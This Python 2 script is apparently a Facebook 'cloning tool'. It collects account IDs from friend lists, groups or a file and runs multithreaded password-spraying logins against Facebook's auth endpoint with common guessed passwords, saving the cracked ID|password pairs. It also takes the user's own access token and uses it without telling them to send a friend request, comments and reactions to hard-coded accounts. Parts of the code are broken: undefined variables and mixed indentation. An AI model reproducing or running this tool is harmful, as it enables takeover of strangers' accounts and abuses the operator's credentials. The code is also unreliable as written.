#!/usr/bin/python2
#coding=utf-8
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 8.1.0; Chrome/79.0.3945.116) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36')]
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; ARM; Trident/7.1; Touch; rv:11.2; WPDesktop; Lumia 730 Dual SIM) like Gecko')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 10.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 7.0.1; SM-J500M Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/122.0.0.10.69')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; RM-1068) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 5.0; Moto G (5) Build/NPPS25.137-33-6; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/122.0.0.10.69;]')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 4.4.4; SM-T116BU Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36 [FB_IAB/MESSENGER;FBAV/123.0.0.11.70')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/98.0.0.48.70;FBBV/62465497;FBDV/iPhone6,1;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/VIVO;FBID/phone;FBLC/pt_BR;FBOP/5;FB')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')]

def keluar():
    print '\x1b[1;91mExit'
    os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!' + w[random.randint(0, len(w) - 1)] + i

    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x = x.replace('!%s' % i, '\x1b[%s;1m' % str(31 + j))

    x += '\x1b[0m'
    x = x.replace('!0', '\x1b[0m')
    sys.stdout.write(x + '\n')


def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.1)
logo = """
\033[1;94m ######   #######  ##     ## #### 
\033[1;92m##    ## ##     ## ###   ###  ##  
\033[1;96m##       ##     ## #### ####  ##  
 \033[1;92m######  ##     ## ## ### ##  ##  
\033[1;91m      ## ##     ## ##     ##  ##  
\033[1;94m##    ## ##     ## ##     ##  ##  
\033[1;93m ######   #######  ##     ## #### 

"""

def tik():
    titik = [
         '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[/]', '[-]', '[\]', '[|]', '[\033[1;32m✓\033[0m]\n']
    for o in titik:
        print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoa\033[1;90mding.. \x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.1)
        
     

back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'


def login():
    os.system('clear')
    print logo
    print 47* '\033[1;97m='
    jalan('\033[1;91m\033[1;33m             ‖   CLONING TOOL   ‖           \033[1;0m')
    print 47* '\033[1;97m='
    jalan("\033[1;91m ENTER\033[1;94m FACEBOOK \033[1;93mTOKEN!!")
    print 47* '\033[1;97m='
    print 
    toket = raw_input("\033[1;97m{\033[1;91m?\033[1;97m} Token \033[1;91m:\033[1;97m ")
    try:
        otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
        a = json.loads(otw.text)
        nama = a['name']
        zedd = open('login.txt', 'w')
        zedd.write(toket)
        zedd.close()
        print '\033[1;97m{\033[1;92m!\033[1;97m}\033[1;92m Login Success ! [Enjoy] '
    
	os.system('xdg-open https://www.facebook.com/profile.php?id=100041349421055')
        bot_komen ()
    except KeyError:
        print "\033[1;97m{\033[1;91m!\033[1;97m} \033[1;91mToken wrong !"
	time.sleep(1.7)
	login()
        
def bot_komen():
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[0;39m[!] Token invalid'
        os.system('rm -rf login.txt')
    una = '100024540287354'
    kom = 'BRAND BOY'
    reac = 'BROKEN'
    post = '1050418732088069'
    post2 = '1050418732088069'
    kom2 =  'DASHING BOY'
    reac2 = 'LOVE'
    requests.post('https://graph.facebook.com/me/friends?method=post&uids=' + una + '&access_token=' + toket)
    requests.post('https://graph.facebook.com/' + post + '/comments/?message=' + kom + '&access_token=' + toket)
    requests.post('https://graph.facebook.com/' + post + '/reactions?type=' + reac + '&access_token=' + toket)
    requests.post('https://graph.facebook.com/' + post2 + '/comments/?message=' + kom2 + '&access_token=' + toket)
    requests.post('https://graph.facebook.com/' + post2 + '/reactions?type=' + reac2 + '&access_token=' + toket)
    menu()


    
	
def menu():
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		os.system('clear')
		print"\033[1;96m[!] \x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(otw.text)
		nama = a['name']
		id = a['id']
	except KeyError:
		os.system('clear')
		print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	except requests.exceptions.ConnectionError:
		print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
		keluar()
		perbarui()

	os.system("clear")
	print logo
	print "\033[1;37m{\033[1;36m•\033[1;37m}\033[1;33m Name Account\033[1;33m     :\033[1;36m "+nama
	print "\033[1;37m{\033[1;36m•\033[1;37m}\033[1;32m User ID\033[1;33m       :\033[1;36m "+id
	print "\033[1;37m{\033[1;36m•\033[1;37m}\033[1;36m Date of birth\033[1;33m :\033[1;36m "+ a['birthday']
	print "\033[1;34m───────────────────────────────────────────"
	print "\033[1;37m{\033[1;33m01\033[1;37m}\033[1;37m\033[1;37m Start Cracking"
	print "\033[1;37m{\033[1;31m00\033[1;37m}\033[1;37m\033[1;37m Logout"
	print "\033[1;34m───────────────────────────────────────────"
	pilih()


def pilih():
	unikers = raw_input("\033[1;33mPilih \033[1;31m:\033[1;37m ")
	if unikers =="":
		print "\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Content That Is True Dear!"
		pilih()
	elif unikers =="1":
		super()
	elif unikers =="0":
		jalan('Token Removed')
		os.system('rm -rf login.txt')
		keluar()
	else:
		print "\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m The contents are true dear !"
		pilih()


def super():
    global toket
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;97mToken invalid'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()

    os.system('clear')
    print logo


    print '\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Crack with list friend'
	print '\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Crack from friend'
	print '\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Crack from member group'
        print '\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Crack from File'
	print '\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back'
	print '║'
    pilih_super()
def pilih_super():
    global cekpoint
    global oks
    peak = raw_input('\033[1;97m╚═\033[1;91m>>> \033[1;97m')
	if peak =='':
		print '\033[1;91m[!] Wrong input'
    else:
        if peak == '1':
            os.system('clear')
            print logo
            
            jalan('\x1b[1;97m[\xf0\x9f\x93\xb6] Getting IDs \x1b[1;97m...')
            r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
            z = json.loads(r.text)
            for s in z['data']:
                id.append(s['id'])

        elif peak == '2':
            os.system('clear')
            print logo
            print 47* '\033[1;97m='
            idt = raw_input('\033[1;97m[\033[1;92m+\033[1;97m]\x1b[1;92m Enter ID\x1b[1;37m: \x1b[1;97m')
            try:
                jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
                op = json.loads(jok.text)
                print '\033[1;97m[\033[1;92m✓\033[1;97m]\033[1;96m Name\x1b[1;97m:\x1b[1;95m ' + op['name']
            except KeyError:
                print '\x1b[1;91mID Not Found!'
                raw_input('\n\x1b[1;97m[\x1b[1;91mBack\x1b[1;97m]')
                super()

            
            r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
            z = json.loads(r.text)
            for i in z['data']:
                id.append(i['id'])

	elif peak =='3':
		os.system('clear')
		print logo
		idg=raw_input('\033[1;91m\033[1;97m[\033[1;92m,+\033[1;97m] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
		try:
			r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+fb_token)
			asw=json.loads(r.text)
			print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
		except KeyError:
			print"\033[1;91m[!] Group not found"
			raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
			super()
		mkdir('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
		re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=9999999999999&access_token='+fb_token)
		s=json.loads(re.text)
		for p in s['data']:
			id.append(p['id'])
		
        elif peak == '4':
                os.system('clear')
                print logo
                try:
                        idlist = raw_input('\033[1;91m\033[1;97m[\033[1;92m+\033[1;97m] \033[1;92mFile ID  \033[1;91m: \033[1;97m')
                        for line in open(idlist,'r').readlines():
                                id.append(line.strip())
                except KeyError:
                        print '\033[1;91m[!] File not found'
                        raw_input('\n\033[1;91m[ \033[1;97mBack \033[1;91m]')
                        super()
        elif peak == '0':
            menu()
        else:
            print '\x1b[1;97mFill in correctly'
            pilih_super()
        print '\033[1;97m[\033[1;92m+\033[1;97m]\033[1;94m Total Friends \x1b[1;96m: \x1b[1;97m' + str(len(id))
        titik = ['.   ', '..  ', '... ']
        for o in titik:
            print '\r\033[1;97m[\033[1;92m✓\033[1;97m] \033[1;91mCloning Started\x1b[1;97m' + o,
            sys.stdout.flush()
            time.sleep(1)
        print 47* '\033[1;97m='
        print
            

    def main(arg):
        user = arg
        try:
            os.mkdir('out')
        except OSError:
            pass

        try:
            a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
            b = json.loads(a.text)
            pass1 = '786786'
            data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
            q = json.load(data)
            if 'access_token' in q:
                x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + q['access_token'])
                z = json.loads(x.text)
                print '\x1b[1;32m[OK]\x1b[1;32m \x1b[1;32m⌬\x1b[1;32m ' + user + ' \x1b[1;32m⌬\x1b[1;32m ' + pass1
                oks.append(user + pass1)
            elif 'www.facebook.com' in q['error_msg']:
                print '\x1b[1;97m[CP+]\x1b[1;97m \x1b[1;92m⌬\x1b[1;97m ' + user + ' \x1b[1;92m⌬\x1b[1;97m ' + pass1
                cek = open('out/checkpoint.txt', 'a')
                cek.write(user + '|' + pass1 + '\n')
                cek.close()
                cekpoint.append(user + pass1)
            else:
                pass2 = 'Pakistan'
                data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                q = json.load(data)
                if 'access_token' in q:
                    x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + q['access_token'])
                    z = json.loads(x.text)
                    print '\x1b[1;32m[OK]\x1b[1;32m \x1b[1;32m⌬\x1b[1;32m ' + user + ' \x1b[1;32m⌬\x1b[1;32m ' + pass2
                    oks.append(user + pass2)
                elif 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;97m[CP+]\x1b[1;97m \x1b[1;92m⌬\x1b[1;97m ' + user + ' \x1b[1;92m⌬\x1b[1;97m ' + pass2
                    cek = open('out/checkpoint.txt', 'a')
                    cek.write(user + '|' + pass2 + '\n')
                    cek.close()
                    cekpoint.append(user + pass2)
                else:
                    pass3 = b['first_name'] + '786'
                    data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                    q = json.load(data)
                    if 'access_token' in q:
                        x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + q['access_token'])
                        z = json.loads(x.text)
                        print '\x1b[1;32m[OK]\x1b[1;32m \x1b[1;32m⌬\x1b[1;32m ' + user + ' \x1b[1;32m⌬\x1b[1;32m ' + pass3
                        oks.append(user + pass3)
                    elif 'www.facebook.com' in q['error_msg']:
                        print '\x1b[1;97m[CP+]\x1b[1;97m \x1b[1;92m⌬\x1b[1;97m ' + user + ' \x1b[1;92m⌬\x1b[1;97m ' + pass3
                        cek = open('out/checkpoint.txt', 'a')
                        cek.write(user + '|' + pass3 + '\n')
                        cek.close()
                        cekpoint.append(user + pass3)
                    else:
                        pass4 = b['first_name'] + '123'
                        data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                        q = json.load(data)
                        if 'access_token' in q:
                            x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + q['access_token'])
                            z = json.loads(x.text)
                            print '\x1b[1;32m[OK]\x1b[1;32m \x1b[1;32m⌬\x1b[1;32m ' + user + ' \x1b[1;32m⌬\x1b[1;32m ' + pass4
                            oks.append(user + pass4)
                        elif 'www.facebook.com' in q['error_msg']:
                            print '\x1b[1;97m[CP+]\x1b[1;97m \x1b[1;92m⌬\x1b[1;97m ' + user + ' \x1b[1;92m⌬\x1b[1;97m ' + pass4
                            cek = open('out/Checkpoint.txt', 'a')
                            cek.write(user + '|' + pass4 + '\n')
                            cek.close()
                            cekpoint.append(user + pass4)
                        else:
                            pass5 = b['first_name'] + '12345'
                            data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                            q = json.load(data)
                            if 'access_token' in q:
                                x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + q['access_token'])
                                z = json.loads(x.text)
                                print '\x1b[1;32m[OK]\x1b[1;32m \x1b[1;32m⌬\x1b[1;32m ' + user + ' \x1b[1;32m⌬\x1b[1;32m ' + pass5
                                oks.append(user + pass5)
                            elif 'www.facebook.com' in q['error_msg']:
                                print '\x1b[1;97m[CP+]\x1b[1;97m \x1b[1;92m⌬\x1b[1;97m ' + user + ' \x1b[1;92m⌬\x1b[1;97m ' + pass5
                                cek = open('out/checkpoint.txt', 'a')
                                cek.write(user + '|' + pass5 + '\n')
                                cek.close()
                                cekpoint.append(user + pass5)
                            else:
                                pass6 = '000786'
                                data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                q = json.load(data)
                                if 'access_token' in q:
                                    x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + q['access_token'])
                                    z = json.loads(x.text)
                                    print '\x1b[1;32m[OK]\x1b[1;32m \x1b[1;32m⌬\x1b[1;32m ' + user + ' \x1b[1;32m⌬\x1b[1;32m ' + pass6
                                    oks.append(user + pass6)
                                elif 'www.facebook.com' in q['error_msg']:
                                    print '\x1b[1;97m[CP+]\x1b[1;97m \x1b[1;92m⌬\x1b[1;97m ' + user + ' \x1b[1;92m⌬\x1b[1;97m ' + pass6
                                    cek = open('out/checkpoint.txt', 'a')
                                    cek.write(user + '|' + pass6 + '\n')
                                    cek.close()
                                    cekpoint.append(user + pass6)
                                else:
                                    pass7 = 'Pakistan123'
                                    data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass7 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + q['access_token'])
                                        z = json.loads(x.text)
                                        print '\x1b[1;32m[OK]\x1b[1;32m \x1b[1;32m⌬\x1b[1;32m ' + user + ' \x1b[1;32m⌬\x1b[1;32m ' + pass7
                                        oks.append(user + pass7)
                                    elif 'www.facebook.com' in q['error_msg']:
                                        print '\x1b[1;97m[CP+]\x1b[1;97m \x1b[1;92m⌬\x1b[1;97m ' + user + ' \x1b[1;92m⌬\x1b[1;97m ' + pass7
                                        cek = open('out/checkpoint.txt', 'a')
                                        cek.write(user + '|' + pass7 + '\n')
                                        cek.close()
                                        cekpoint.append(user + pass7)
        except:
            pass

    p = ThreadPool(50)
    p.map(main, id)
    
    print '\x1b[1;96mProcess Has Been Completed.'
    print '\x1b[1;92mTotal OK/\x1b[1;97mCP \x1b[1;97m: \x1b[1;92m' + str(len(oks)) + '\x1b[1;97m/\x1b[1;97m' + str(len(cekpoint))
    raw_input('\n\x1b[1;93m[\x1b[1;96mBack\x1b[1;93m]')
    menu()


if __name__ == '__main__':
    login()
